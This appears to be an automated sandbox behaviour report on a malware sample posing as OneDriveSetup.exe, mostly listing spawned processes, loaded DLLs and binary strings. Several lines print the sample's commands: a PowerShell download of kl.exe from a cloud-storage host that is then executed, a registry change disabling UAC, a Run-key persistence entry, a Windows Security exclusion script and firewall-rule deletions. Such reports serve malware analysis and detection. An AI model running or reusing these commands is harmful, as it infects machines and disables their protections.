                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: OneDriveSetup.exe, 00000000.00000000.1201142433.00007FF6B5263000.00000008.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309856968.00007FF6B5264000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: OneDriveSetup.exe, 00000000.00000000.1201142433.00007FF6B5263000.00000008.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309856968.00007FF6B5264000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: OneDriveSetup.exe, 00000000.00000000.1201142433.00007FF6B5263000.00000008.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309856968.00007FF6B5264000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1519770378.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: OneDriveSetup.exeVirustotal: Detection: 10%
                Source: OneDriveSetup.exeString found in binary or memory: alse</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>false</StopOnIdleEnd> <RestartOnIdle>false</Restart
                Source: OneDriveSetup.exeString found in binary or memory: alse</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>false</StopOnIdleEnd> <RestartOnIdle>false</Restart
                Source: OneDriveSetup.exeString found in binary or memory: y> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
                Source: OneDriveSetup.exeString found in binary or memory: y> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
                Source: Agghosts.exeString found in binary or memory: <!--StartFragment
                Source: unknownProcess created: C:\Users\user\Desktop\OneDriveSetup.exe "C:\Users\user\Desktop\OneDriveSetup.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                Source: unknownProcess created: C:\Users\Public\Music\20250413054815\Agghosts.exe "C:\Users\Public\Music\20250413054815\Agghosts.exe"
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250413054815\1.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
                Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Videos\bin.exe "C:\Users\Public\Videos\bin.exe"
                Source: unknownProcess created: C:\Users\Public\Music\20250413054815\Agghosts.exe "C:\Users\Public\Music\20250413054815\Agghosts.exe"
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver"
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000118"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" checkNetFramework
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                Source: unknownProcess created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "Jump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250413054815\1.bat" "Jump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /fJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Videos\bin.exe "C:\Users\Public\Videos\bin.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901Jump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=letsJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exeJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exeJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPROJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPNJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFrameworkJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver"
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000118"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" checkNetFramework
                Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe"
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: wer.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: wscapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: cldapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: fltlib.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: twext.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: cscui.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: cscobj.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: workfoldersshell.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: starttiledata.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: usermgrproxy.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: acppage.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: msi.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
